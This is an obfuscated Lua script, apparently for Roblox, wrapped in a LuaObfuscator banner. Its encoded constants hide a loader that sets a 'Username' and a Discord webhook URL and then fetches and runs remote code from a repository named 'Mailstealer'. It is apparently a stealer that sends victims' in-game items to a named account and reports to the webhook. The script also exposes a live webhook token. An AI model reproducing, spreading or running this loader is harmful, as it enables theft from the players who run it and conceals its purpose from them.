--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v100=v5(v85,v19);v19=nil;return v100;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=0 -0 ;local v87;while true do if (v86==((1637 -(1523 + 114)) -(0 + 0))) then v87=(v31/(2^(v32-(1 -(0 -0)))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v87-(v87%((1634 -(68 + 997)) -(367 + 201))) ;end end else local v88=((2199 -(226 + 1044)) -(214 + (3104 -2391)))^(v32-(1 + 0)) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (877 -((399 -(32 + 85)) + 595)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (1213 -(892 + 65))) + v36 ;end if (v35==((180 -(67 + 113)) -0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v35=351 -(87 + 263) ;end end end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (1000 -(915 + 82)) + 1 ;v38=3 -2 ;end if (v38==(953 -(802 + 150))) then return (v42 * (45169940 -28392724)) + (v41 * (118879 -53343)) + (v40 * (187 + (195 -126))) + v39 ;end end end local function v24()local v43=0 + (0 -0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(0 -0)) then v44=v23();v45=v23();v43=(2601 -(447 + 966)) -(1069 + 118) ;end if (v43==(6 -3)) then if (v48==(0 -0)) then if (v47==(0 + (701 -(376 + 325)))) then return v49 * (0 -0) ;else v48=1 + 0 ;v46=0 + (0 -0) ;end elseif (v48==(2838 -(368 + 423))) then return ((v47==(0 -0)) and (v49 * ((19 -(10 + (24 -16)))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1465 -(416 + 26)) ) * (v46 + (v47/(((408 + 1017) -(630 + (1746 -953)))^(175 -123)))) ;end if (v43==(9 -7)) then v48=v20(v45,66 -45 ,106 -75 );v49=((v20(v45,14 + 18 )==(1 -0)) and  -((781 -(9 + 5)) -(745 + 21))) or (439 -((396 -251) + 293)) ;v43=433 -(44 + 386) ;end if (v43==(1487 -(998 + 488))) then v46=1 + 0 ;v47=(v20(v45,1 + 0 ,(393 -(85 + 291)) + (1268 -(243 + 1022)) ) * ((8 -6)^(804 -((2018 -(1703 + 114)) + (2172 -1601))))) + v44 ;v43=2;end end end local function v25(v50)local v51;if  not v50 then local v89=0 + 0 ;while true do if (v89==(1180 -(1123 + (1987 -(1869 + 61))))) then v50=v23();if (v50==(0 + 0)) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;local v52={};for v67=255 -(163 + 91) , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==3) then v60=nil;while true do local v92=0;local v93;while true do if (0==v92) then v93=0 -0 ;while true do if (v93~=(0 + 0)) then else if (v54~=(561 -(306 + 254))) then else local v107=0 + 0 ;while true do if (2==v107) then v54=2;break;end if (v107==0) then v59=v23();v60={};v107=1 -0 ;end if (v107~=(1468 -(899 + 568))) then else for v161=1 + 0 ,v59 do local v162=0;local v163;local v164;local v165;local v166;while true do if (v162~=0) then else local v184=0 -0 ;while true do if (v184~=(604 -(268 + 335))) then else v162=1;break;end if (v184==0) then v163=0;v164=nil;v184=291 -(60 + 230) ;end end end if (v162~=1) then else v165=nil;v166=nil;v162=2;end if (v162~=2) then else while true do if (v163==(572 -(426 + 146))) then v164=0;v165=nil;v163=1;end if (1~=v163) then else v166=nil;while true do if (v164==(1 + 0)) then if (v165==(1457 -(282 + 1174))) then v166=v21()~=0 ;elseif (v165==(813 -(569 + 242))) then v166=v24();elseif (v165==(8 -5)) then v166=v25();end v60[v161]=v166;break;end if (v164==(0 + 0)) then local v192=0;local v193;while true do if (v192==0) then v193=0;while true do if (v193==(1024 -(706 + 318))) then local v199=1251 -(721 + 530) ;local v200;while true do if (v199==(1271 -(945 + 326))) then v200=0 -0 ;while true do if (v200~=1) then else v193=1;break;end if (v200~=(0 + 0)) then else v165=v21();v166=nil;v200=1;end end break;end end end if (v193~=(701 -(271 + 429))) then else v164=1;break;end end break;end end end end break;end end break;end end end v58[3]=v21();v107=2;end end end if (v54~=(0 + 0)) then else local v108=1500 -(1408 + 92) ;while true do if (v108==(1088 -(461 + 625))) then v54=1289 -(993 + 295) ;break;end if (v108==(1 + 0)) then v57={};v58={v55,v56,nil,v57};v108=1 + 1 ;end if (v108==(0 + 0)) then v55={};v56={};v108=1;end end end v93=530 -(406 + 123) ;end if (v93~=(1770 -(1749 + 20))) then else if (v54~=2) then else for v109=1 + 0 ,v23() do local v110=0;local v111;local v112;local v113;while true do if (0~=v110) then else v111=1322 -(1249 + 73) ;v112=nil;v110=1 + 0 ;end if ((1146 -(466 + 679))==v110) then v113=nil;while true do if (v111~=0) then else local v185=0 -0 ;while true do if (v185==0) then v112=0;v113=nil;v185=1;end if (v185~=(2 -1)) then else v111=1901 -(106 + 1794) ;break;end end end if (v111==1) then while true do if ((0 + 0)~=v112) then else v113=v21();if (v20(v113,1,1)==(0 + 0)) then local v186=0 -0 ;local v187;local v188;local v189;local v190;while true do if (v186~=2) then else while true do if (v187~=0) then else local v194=0 -0 ;local v195;while true do if (v194~=(114 -(4 + 110))) then else v195=0;while true do if (v195==0) then v188=v20(v113,586 -(57 + 527) ,3);v189=v20(v113,4,1433 -(41 + 1386) );v195=104 -(17 + 86) ;end if (v195==(1 + 0)) then v187=1;break;end end break;end end end if (v187~=(6 -3)) then else if (v20(v189,3,3)==1) then v190[4]=v60[v190[11 -7 ]];end v55[v109]=v190;break;end if (v187==2) then local v197=0;while true do if (v197~=0) then else if (v20(v189,1,167 -(122 + 44) )~=(1 -0)) then else v190[2]=v60[v190[6 -4 ]];end if (v20(v189,2 + 0 ,1 + 1 )==1) then v190[5 -2 ]=v60[v190[68 -(30 + 35) ]];end v197=1 + 0 ;end if (v197==(1258 -(1043 + 214))) then v187=11 -8 ;break;end end end if (v187~=(1213 -(323 + 889))) then else local v198=0;while true do if (v198~=1) then else v187=5 -3 ;break;end if (v198~=(580 -(361 + 219))) then else v190={v22(),v22(),nil,nil};if (v188==0) then local v207=982 -(18 + 964) ;local v208;local v209;local v210;while true do if (v207==1) then v210=nil;while true do if (v208~=1) then else while true do if (0~=v209) then else v210=0;while true do if (v210==0) then v190[3]=v22();v190[14 -10 ]=v22();break;end end break;end end break;end if (v208~=(0 + 0)) then else local v213=0 + 0 ;while true do if (v213==0) then v209=0;v210=nil;v213=1;end if (v213==1) then v208=851 -(20 + 830) ;break;end end end end break;end if (v207~=0) then else v208=0 + 0 ;v209=nil;v207=127 -(116 + 10) ;end end elseif (v188==1) then v190[1 + 2 ]=v23();elseif (v188==(740 -(542 + 196))) then v190[6 -3 ]=v23() -((1 + 1)^(9 + 7)) ;elseif (v188==(2 + 1)) then local v214=0 -0 ;local v215;while true do if (v214~=(0 -0)) then else v215=1551 -(1126 + 425) ;while true do if (v215==(405 -(118 + 287))) then v190[11 -8 ]=v23() -(2^(1137 -(118 + 1003))) ;v190[4]=v22();break;end end break;end end end v198=2 -1 ;end end end end break;end if (v186==0) then v187=377 -(142 + 235) ;v188=nil;v186=1;end if (v186==1) then v189=nil;v190=nil;v186=9 -7 ;end end end break;end end break;end end break;end end end for v114=1,v23() do v56[v114-1 ]=v28();end return v58;end break;end end break;end end end break;end if (v53==2) then v58=nil;v59=nil;v53=1 + 2 ;end if (v53==0) then v54=0;v55=nil;v53=1;end if (v53~=1) then else v56=nil;v57=nil;v53=979 -(553 + 424) ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v90=0,v77 do if (v90>=v71) then v75[v90-v71 ]=v76[v90 + 1 ];else v79[v90]=v76[v90 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v91=0;while true do if (v91==1) then if (v82<=5) then if (v82<=2) then if (v82<=0) then do return;end elseif (v82==1) then local v116=v81[2];v79[v116]=v79[v116](v13(v79,v116 + 1 ,v74));else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=3) then local v101=0;local v102;local v103;local v104;local v105;local v106;while true do if (2==v101) then v81=v69[v73];v106=v81[2];v105=v79[v81[3]];v79[v106 + 1 ]=v105;v79[v106]=v105[v81[4]];v73=v73 + 1 ;v101=3;end if (v101==5) then v79[v106]=v79[v106](v13(v79,v106 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v101=6;end if (v101==1) then v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;v101=2;end if (v101==4) then v74=(v104 + v106) -1 ;v102=0;for v156=v106,v74 do local v157=0;while true do if (v157==0) then v102=v102 + 1 ;v79[v156]=v103[v102];break;end end end v73=v73 + 1 ;v81=v69[v73];v106=v81[2];v101=5;end if (6==v101) then v73=v81[3];break;end if (v101==3) then v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v106=v81[2];v103,v104=v72(v79[v106](v13(v79,v106 + 1 ,v81[3])));v101=4;end if (0==v101) then v102=nil;v103,v104=nil;v105=nil;v106=nil;v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v101=1;end end elseif (v82>4) then local v119=0;local v120;local v121;while true do if (v119==0) then v120=v81[2];v121=v79[v81[3]];v119=1;end if (v119==1) then v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];break;end end elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82<=8) then if (v82<=6) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>7) then v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v73=v81[3];else v79[v81[2]]=v81[3];end elseif (v82<=10) then if (v82>9) then v73=v81[3];else local v130=0;local v131;local v132;local v133;local v134;while true do if (v130==0) then v131=v81[2];v132,v133=v72(v79[v131](v13(v79,v131 + 1 ,v81[3])));v130=1;end if (2==v130) then for v179=v131,v74 do v134=v134 + 1 ;v79[v179]=v132[v134];end break;end if (1==v130) then v74=(v133 + v131) -1 ;v134=0;v130=2;end end end elseif (v82==11) then v63[v81[3]]=v79[v81[2]];else v79[v81[2]]();end v73=v73 + 1 ;break;end if (v91==0) then v81=v69[v73];v82=v81[1];v91=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D65030E3O00536861756E4C6F766573422O657303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31393734362O3033343835393332333437322F49796F326F7346347873593372715478455355436F55467A4371776F6D334E4F434C516B35536572384E6B6E524D577069516675684349703949534C676857453952795200163O0012073O00013O0026063O000D0001000200040A3O000D00012O000200015O001203000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026063O00010001000100040A3O00010001001207000100093O001208000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100016O00017O00",v9(),...);
